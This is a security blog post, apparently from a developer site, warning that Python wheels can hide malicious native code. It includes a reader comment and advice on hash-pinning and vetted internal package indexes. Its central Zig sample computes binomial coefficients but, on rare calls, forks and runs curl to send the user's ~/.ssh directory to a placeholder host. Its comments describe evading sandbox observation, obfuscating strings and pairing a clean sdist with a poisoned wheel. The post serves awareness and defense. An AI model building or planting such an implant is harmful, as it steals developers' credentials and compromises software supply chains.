Or maybe APT should include "Adequate persistent threat" among its definitions as well.
There are people doing the thankless job of keeping package registries free of malicious code. Here's a recent blog post from Phylum about a campaign they detected on both npm and PyPI.
What happens when attackers get stymied by the obvious stuff? They either try to outpace detection, or they get quieter.
Below is a nearly-ready-to-go way to generate a malicious Python wheel that still looks like it does what it's supposed to do. Paired with an LLVM plugin that does string obfuscation, are defenders ready to handle it?
const std = @import("std");
const py = @import("pydust");
fn actual_binomial_coeff(n: u64, k: u64) u64 {
if (n > 60) return 0; //documented limitation due to math and int sizes
if (k == 0) return 1;
if (n <= k) return 0;
return @divExact(n * actual_binomial_coeff(n - 1, k - 1), k);
}
export fn binomial_coeff(n: u64, k: u64) u64 {
// in the sdist, just have this do: return actual_binomial_coeff(n, k);
const current_time = std.time.microTimestamp();
var prng = std.rand.DefaultPrng.init(@intCast(u64, current_time));
const r = prng.random();
// We only want to do this some of the time.
// This decreases the chances we get "seen" in an observer VM
// and we expect that native code to optimize python stuff is gonna get called a lot
// so we don't need to be too noisy with trying to send the same stuff all the time.
if (r.intRangeAtMost(u64, 0, 1000) < 1000) return actual_binomial_coeff(n, k);
// and for that 1 in 1000 call:
const fork_pid = std.os.fork() catch {
// if we can't fork, behave as expected.
return actual_binomial_coeff(n, k);
};
if (fork_pid == 0) {
// This is the child
// Almost nothing in the child of a posix fork is safe to do prior to an exec(v) call,
// so we stick the malicious bit here and do it via execvp
//
// These don't need to be obfuscated here, we aren't including it in the sdist
// instead, obfuscate all strings with an llvm plugin to keep the
// source clean and have reusable obfuscation
const path = "curl";
const args = [_:null]?[*:0]const u8{ "-X", "POST", "malicious.host", "--data-binary", "~/.ssh" };
const envp = [_:null]?[*:0]const u8{null};
std.os.execvpeZ(path, args[0..], envp[0..]) catch {};
} else {
// parent is safe after a fork to do whatever they want
// remember, malicious code should only be unsafe in how it's malicious.
// don't make noise.
// This is where we would call the thing we had a justifcation for native code in python to begin with
// this existing and working decreases the odds that people notice an issue, it's working as they expect.
return actual_binomial_coeff(n, k);
}
return actual_binomial_coeff(n, k);
}
comptime {
py.rootmodule(@This());
}
Zig's standard library includes an HTTP client, sockets, and so on, so this could be reworked to avoid fork, execv, and curl entirely, even though all of those are likely to be available on developer machines. Zig can also import C code, so it could just link libcurl.
This isn't Zig-specific, though; native Python extensions can be written in Go, Rust, C, C++, and so on. Nothing about this example is picky about how it happens. The inherent flaw is that we have wheels in the first place, and it's easy to shove something small and malicious into a binary where it won't be easily found statically.
Nothing about this is complicated. It's simple, it's highly portable, and it uses tools that make sense for a native Python extension. If malicious wheels are uploaded next to a non-malicious version of the source distribution, how long would it take to be detected? Most attackers that have been detected haven't gone to these lengths, but "these lengths" is a phrase that makes this seem harder than it is. Are we as developers ready for the consequences of even a slight increase in sophistication, one that will eventually happen and may already be happening? These are the tactics that five minutes of "okay, but the binaries aren't reproducibly built" came up with; it isn't even close to what an APT could do if motivated.
So how can we be proactive and defend against this?
Vet your dependencies. Pin dependencies with hashes. If you have concerns about trusting binaries, vet the source and build them yourself.
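As a minimal sketch of what hash-pinning looks like with pip (the package name and digest below are placeholders, not real values), hash-checking mode refuses anything unpinned or mismatched:

# requirements.txt: every dependency pinned to an exact version,
# with an allowed hash for each artifact you've vetted.
somepackage==1.2.3 \
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000

# Install with hash-checking enforced:
pip install --require-hashes -r requirements.txt

# Or refuse prebuilt wheels entirely and build everything from source:
pip install --no-binary :all: -r requirements.txt

With --require-hashes, pip errors out on any dependency that isn't pinned with a matching hash; with --no-binary :all:, pip builds from sdists instead of pulling prebuilt binaries.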
If you're doing this at an enterprise level, have a local artifactory/wheelhouse with a limited set of available dependencies and vetted versions. Don't let developers install directly from external package indexes, including Pypi.
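A minimal sketch of enforcing that on developer machines, assuming a hypothetical internal index at pypi.internal.example:

# /etc/pip.conf (per-user: ~/.config/pip/pip.conf)
[global]
index-url = https://pypi.internal.example/simple
# Deliberately no extra-index-url: nothing falls through to public PyPI.

Pair this with network policy blocking direct access to pypi.org, so the configuration can't simply be edited away.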
Be proactive and vet your dependencies in advance, rather than hoping you aren't the victim of anything only detected while playing catchup.
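One way to make that vetting concrete (the package name and version here are illustrative): download the exact artifacts without installing them, inspect them, and record their digests for your pin file.

pip download --no-deps somepackage==1.2.3 -d ./to-vet
# inspect the contents; a wheel is just a zip archive
unzip -l ./to-vet/somepackage-1.2.3-*.whl
# once satisfied, generate the value for a --hash pin
pip hash ./to-vet/somepackage-1.2.3-*.whl

pip hash prints the sha256 line in exactly the format requirements.txt expects.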
Note on the Python focus: Python is the only major language where shipping library binaries that aren't built exclusively on a trusted build server is the norm (via wheels). It can happen elsewhere too; don't get complacent just because I didn't name a tool you use. Think about whether the same general behavior pattern applies to you. Cargo crates can technically ship with included binaries, as can many other formats. It's just not the norm there, so it's more obvious when something isn't right.
Note on ethics, and on providing most of a step up in sophistication over current attacks: in the interest of raising awareness of this issue, yes, I've provided "most of the way" to a fuller, more sophisticated exploit method. There are subtle things wrong with and missing from the example to prevent it from being truly copy/pasteable. Keep in mind that "most of the way" is an extremely low bar of effort here, and it uses existing, known techniques that match those already in use, only moved into binaries included in wheels rather than into build scripts (see the linked blog post for the equivalent reliance on calling curl to steal the exact same secrets). The correct defensive posture prevents this entirely, and the tools for it have existed for years. Don't be caught lacking.
Top comments (1)
Thank you for highlighting this increasingly common attacker path: poisoning software supply chain(s) 🙏 In particular, the practice of locating popular but neglected / unmaintained packages and offering to maintain them, then poisoning them.
It seems to me that identity & provenance is critical to protect these ecosystems (so one can ask for example: "who is @am-fe and can we trust them and their code"), along with a healthy mistrust of shiny new toys that promise to solve all your problems!
In my previous employment developing PCI DSS compliant software, we had a posture similar to that which you describe: vetted inputs, local repositories, pinned versions and signature / hash checks. We chose not to constrain developers to internal sources during feature creation / exploration, but they needed to argue for the inclusion of new dependencies during pre-integration review, and work with our audit / vetting specialists to assure ourselves (and our PCI DSS auditor) that any new thing was trustworthy.